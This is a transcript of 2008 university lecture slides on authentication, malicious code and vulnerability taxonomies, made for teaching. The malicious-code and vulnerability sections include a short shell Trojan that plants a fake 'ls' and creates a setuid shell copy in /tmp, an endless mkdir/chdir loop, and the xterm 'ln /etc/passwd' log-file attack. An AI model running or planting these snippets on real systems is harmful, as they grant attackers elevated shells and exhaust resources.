Lecture 1 - University of Pittsburgh

Download Report

Transcript Lecture 1 - University of Pittsburgh

IS 2150 / TEL 2810
Introduction to Security
James Joshi
Associate Professor, SIS
Lecture 9
Nov 25, 2008
Authentication, Identity
Malicious Code,
Vulnerability Analysis
1
Objectives

Understand/explain the issues related
to, and utilize the techniques


Authentication and identification
Malicious code


What and how
Vulnerability analysis/classification


Techniques
Taxonomy
2
Authentication and Identity
3
What is Authentication?

Authentication:


Binding identity and external entity to subject
How do we do it?
 Entity knows something (secret)


Entity has something


Badge, smart card
Entity is something


Passwords, id numbers
Biometrics: fingerprints or retinal characteristics
Entity is in someplace

Source IP, restricted area terminal
4
Authentication System:
Definition

A: Set of authentication information


C: Set of complementary information




used by system to validate authentication information (e.g.,
hash of a password or the password itself)
F: Set of complementation functions (to generate C)


used by entities to prove their identities (e.g., password)
f:A→C
Generate appropriate c  C given a  A
L: set of authentication functions

l: A  C → { true, false }

verify identity
S: set of selection functions


Generate/alter A and C
e.g., commands to change password
5
Authentication System:
Passwords


Example: plaintext passwords
 A = C = alphabet*
 f returns argument:
f(a) returns a
 l is string equivalence:
l(a, b) is true if a = b
Complementation Function

Null (return the argument as above)


requires that c be protected; i.e. password file needs to be
protected
One-way hash – function such that


Complementary information c = f(a) easy to compute
f-1(c) difficult to compute
6
Passwords

Example: Original Unix

A password is up to eight characters






each character could be one of 127 possible characters;
A contains approx. 6.9 x 1016 passwords
Password is hashed using one of 4096 functions into a 11
character string
2 characters pre-pended to indicate the hash function
used
C contains passwords of size 13 characters, each
character from an alphabet of 64 characters
23 strings
 Approximately 3.0 x 10
Stored in file /etc/passwd (all can read)
7
Authentication System


Goal: identify the entities correctly
Approaches to protecting


Hide enough information so that one of a, c or f
cannot be found
 Make C readable only to root
 Make F unknown
Prevent access to the authentication functions L
 root cannot log in over the network
8
Attacks on Passwords

Dictionary attack: Trial and error guessing



Type 1: attacker knows A, f, c
 Guess g and compute f(g) for each f in F
Type 2: attacker knows A, l
 l returns True for guess g
Counter: Difficulty based on |A|, Time




Probability P of breaking in time T
G be the number of guesses that can be tested in one
time unit
|A| ≥ TG/P
Assumptions:

time constant; all passwords are equally likely
9
Password Selection

Random


Depends on the quality of random number generator;
Size of legal passwords


Pronounceable nonsense



8 characters: humans can remember only one
Based on unit of sound (phoneme)
Easier to remember
User selection (proactive selection)

Controls on allowable


At least 1 digit, 1 letter, 1 punctuation, 1 control character
Obscure poem verse
10
Password Selection

Reusable Passwords susceptible to dictionary
attack (type 1)

Salting can be used to increase effort needed




makes the choice of complementation function a function
of randomly selected data
Random data is different for different user
Authentication function is chosen on the basis of the salt
Many Unix systems:


A salt is randomly chosen from 0..4095
Complementation function depends on the salt
11
Password Selection

Password aging



Change password after some time: based
on expected time to guess a password
Disallow change to previous n passwords
Fundamental problem is reusability


Replay attack is easy
Solution:

Authenticate in such a way that the transmitted
password changes each time
12
Authentication Systems:
Challenge-Response

Pass algorithm


authenticator sends message m
subject responds with f(m)


f is a secret encryption function
Example: ask for second input based on
some algorithm
13
Authentication Systems:
Challenge-Response


One-time password: invalidated after use
 f changes after use
S/Key uses a hash function (MD4/MD5)
 User chooses an initial seed k

Key generator calculates


Passwords used in the order


k1 = h(k), k2 = h(k1) …, kn = h(kn-1)
p1 = kn, p2 = kn-1, …, pn =k1
Suppose p1 = kn is intercepted;


the next password is p2 = kn-1
Since h(kn-1) = kn, the attacker needs to invert h to determine the
next password
14
Authentication Systems:
Biometrics

Used for human subject identification based on
physical characteristics that are tough to copy





Fingerprint (optical scanning)
 Camera’s needed (bulky)
Voice
 Speaker-verification (identity) or speaker-recognition
(info content)
Iris/retina patterns (unique for each person)
 Laser beaming is intrusive
Face recognition
 Facial features can make this difficult
Keystroke interval/timing/pressure
15
Attacks on Biometrics

Fake biometrics



fingerprint “mask”
copy keystroke pattern
Fake the interaction between device
and system


Replay attack
Requires careful design of entire
authentication system
16
Malicious Code
17
What is Malicious Code?

Set of instructions that causes a security
policy to be violated




unintentional mistake
Tricked into doing that?
“unwanted” code
Generally relies on “legal” operations
 Authorized user could perform operations

without violating policy
Malicious code “mimics” authorized user
18
Types of Malicious Code

Trojan Horse


Virus


What is it?
What is it?
Worm

What is it?
19
Trojan Horse

Program with an overt (expected) and covert
(unexpected) effect



User tricked into executing Trojan horse



Appears normal/expected
Covert effect violates security policy
Expects (and sees) overt behavior
Covert effect performed with user’s authorization
Trojan horse may replicate


Create copy on execution
Spread to other users/systems
20
Example




Perpetrator
cat >/homes/victim/ls <<eof
cp /bin/sh /tmp/.xxsh
chmod u+s,o+x /tmp/.xxsh
rm ./ls
ls $*
eof
Victim
ls
What happens?
How to replicate this?
21
Virus

Self-replicating code

A freely propagating Trojan horse


Inserts itself into another file


some disagree that it is a Trojan horse
Alters normal code with “infected” version
Operates when infected code executed
If spread condition then
For target files
if not infected then alter to include virus
Perform malicious action
Execute normal program
22
Virus Types

Boot Sector Infectors (The Brain Virus)


Problem: How to ensure virus “carrier” executed?
Solution: Place in boot sector of disk



Propagate by altering boot disk creation
Executable infector


Run on any boot
The Jerusalem Virus, Friday 13th, not 1987
Multipartite virus : boot sector + executable infector
23
Virus Types/Properties

Terminate and Stay Resident



Stealth (an executable infector)


Stays active in memory after application complete
Allows infection of previously unknown files
Conceal Infection
Encrypted virus



Prevents “signature” to detect virus
[Deciphering routine, Enciphered virus code, Deciphering Key]
Polymorphism

Change virus code to something equivalent each time it propagates
24
Virus Types/Properties

Macro Virus


Composed of a sequence of instructions that is
interpreted rather than executed directly
Infected “executable” isn’t machine code



Relies on something “executed” inside application
Example: Melissa virus infected Word 97/98 docs
Otherwise similar properties to other viruses


Architecture-independent
Application-dependent
25
Worms

Replicates from one computer to
another




Self-replicating: No user action required
Virus: User performs “normal” action
Trojan horse: User tricked into performing
action
Communicates/spreads using standard
protocols
26
Other forms of malicious logic

We’ve discussed how they propagate


Rabbits/Bacteria



But what do they do?
Exhaust system resources of some class
Denial of service; e.g., While (1) {mkdir x; chdir x}
Logic Bomb

Triggers on external event


Performs system-damaging action


Date, action
Often related to event
Others?
27
We can’t detect it: Now what?
Detection



Signature-based antivirus
 Look for known patterns in malicious code
 Great business model!
Checksum (file integrity, e.g. Tripwire)
 Maintain record of “good” version of file
Validate action against specification
 Including intermediate results/actions
 N-version programming: independent programs

A fault-tolerance approach (diversity)
28
Detection

Proof-carrying code


Code includes proof of correctness
At execution, verify proof against code


If code modified, proof will fail
Statistical Methods



High/low number of files read/written
Unusual amount of data transferred
Abnormal usage of CPU time
29
Defense

Clear distinction between data and
executable

Virus must write to program


Must execute to spread/act


Write only allowed to data
Data not allowed to execute
Auditable action required to change data to
executable
30
Defense

Information Flow Control



Limits spread of virus
Problem: Tracking information flow
Least Privilege

Programs run with minimal needed
privilege
31
Defense

Sandbox / Virtual Machine



Run in protected area
Libraries / system calls replaced with
limited privilege set
Use Multi-Level Security Mechanisms

Place programs at lowest level
Don’t allow users to operate at that level

Prevents writes by malicious code

32
Vulnerability Analysis
33
Vulnerability Analysis

Vulnerability or security flaw: specific failures
of security controls (procedures, technology
or management)





Errors in code
Human violators
Mismatch between assumptions
Exploit: Use of vulnerability to violate policy
Attacker: Attempts to exploit the vulnerability
34
Techniques for Detecting
Vulnerabilities

System Verification
Determine preconditions, post-conditions
 Validate that system ensures post-conditions given
preconditions
Can prove the absence of vulnerabilities


Penetration testing
Start with system/environment characteristics
 Try to find vulnerabilities
Can not prove the absence of vulnerabilities

35
Types/layers of Penetration
Testing

Black Box (External Attacker)



System access provided (External Attacker)



External attacker has no knowledge of target system
Attacks built on human element – Social Engineering
Red team provided with limited access to system
Goal is to gain normal or elevated access
Internal attacker


Red team provided with authorized user access
Goal is to elevate privilege / violate policy
36
Red Team Approach
Flaw Hypothesis Methodology:

Information gathering


Flaw hypothesis


Flaw does
Not exist
Determine where vulnerabilities exist
Flaw generalization


Predict likely vulnerabilities
Flaw testing


Examine design, environment, system functionality
Refine with new
understanding
Attempt to broaden discovered flaws
Flaw elimination (often not included)

Suggest means to eliminate flaw
37
Problems with
Penetration Testing

Nonrigorous




Dependent on insight (and whim) of testers
No good way of evaluating when “complete”
How do we make it systematic?

Try all classes of likely flaws

But what are these?
Vulnerability Classification!
38
Vulnerability Classification

Goal: describe spectrum of possible flaws




Enables design to avoid flaws
Improves coverage of penetration testing
Helps design/develop intrusion detection
How do we classify?



By how they are exploited?
By where they are found?
By the nature of the vulnerability?
39
Example flaw: xterm log

xterm runs as root




Generates a log file
Appends to log file if file exists
Problem: ln /etc/passwd log_file
Solution
if (access(“log_file”, W_OK) == 0)
If ((fd = open(“log_file”, O_WRONLY|O_APPEND)) < 0) {
- error handling
}
What can go wrong?
40
Example: Finger Daemon
(exploited by Morris worm)

finger sends name to fingerd





fingerd allocates 512 byte buffer on stack
Places name in buffer
Retrieves information (local finger) and returns
Problem: If name > 512 bytes, overwrites
return address
Exploit: Put code in “name”, pointer to code
in bytes 513+

Overwrites return address
41
RISOS:Research Into Secure
Operating Systems (7 Classes)
1.
–
2.
–
Incomplete parameter validation
E.g., buffer overflow –
Inconsistent parameter validation
Different routines with different formats for same data
Implicit sharing of privileged / confidential data
3.
–
OS fails to isolate processes and users
Asynchronous validation / inadequate serialization
4.
–
Race conditions and TOCTTOU flaws
Inadequate identification /authentication / authorization
5.
–
Trojan horse; accounts without passwords
Violable prohibition / limit
6.
–
Improper handling of bounds conditions (e.g., in memory allocation)
Exploitable logic error
7.
–
Incorrect error handling, incorrect resource allocations etc.
42
Protection Analysis Model
Classes

Pattern-directed protection evaluation


Applied to several operating systems


Methodology for finding vulnerabilities
Discovered previously unknown
vulnerabilities
Resulted in two-level hierarchy of
vulnerability classes

Ten classes in all
43
PA flaw classes
1.
2.
3.
4.
Improper protection domain initialization and enforcement
a. domain: Improper choice of initial protection domain
b. exposed representations: Improper isolation of
implementation detail (Covert channels)
c. consistency of data over time: Improper change
d. naming: Improper naming (two objects with same name)
e. residuals: Improper deallocation or deletion
Improper validation validation of operands, queue
management dependencies:
Improper synchronization
a. interrupted atomic operations: Improper indivisibility
b. serialization: Improper sequencing
Improper choice of operand or operation critical operator
selection errors
44
NRL Taxonomy

Three classification schemes



How did it enter
When was it “created”
Where is it
Genesis
Intentional
Malicious
Trapdoor
Trojan horse
Nonreplicating
Nonmalicious
Logic/time bomb
Replicating
Covert channel
Timing
Other
Storage
45
NRL Taxonomy (Genesis)
Validation error (Incomplete/Inconsistent)
Domain error (including object re-use, residuals, and
exposed representation errors
Inadvertent
Serialization/aliasing (including TCTTOU errors)
Boundary conditions violation (including resource
exhaustion and violable constraint errors)
Other exploitable logic error
46
NRL Taxonomy:
Time
Time of
introduction
Development
Requirement
specification
design
Source code
Maintenance
Operation
Object code
47
NRL Taxonomy:
Location
Location
Operating
System
Software
Hardware
Application
Support
System
initialization
Memory Management
Privileged
Utilities
Process management
/ scheduling
Device management
Unprivileged
Utilities
File Management
Identification /
Authentication
Other /
Unknown
48
Aslam’s Model

Attempts to classify faults
unambiguously



Emergent Faults

Decision procedure to classify
faults


Coding Faults

Synchronization errors



Timing window
Improper serialization
Configuration errors


Wrong install location
Wrong configuration
information
Wrong permissions
Environment Faults
Condition validation errors




Bounds not checked
Access rights ignored
Input not validated
Authentication / Identification
failure
49
Common Vulnerabilities and
Exposures (cve.mitre.org)

Captures specific
vulnerabilities



Standard name
Cross-reference to
CERT, etc.
Name
CVE-1999-0965
Description
Race condition in
xterm allows local
users to modify
arbitrary files via
the logging option.
Entry has three
parts



Unique ID
Description
References
References
•CERT:CA-93.17
•XF:xterm
50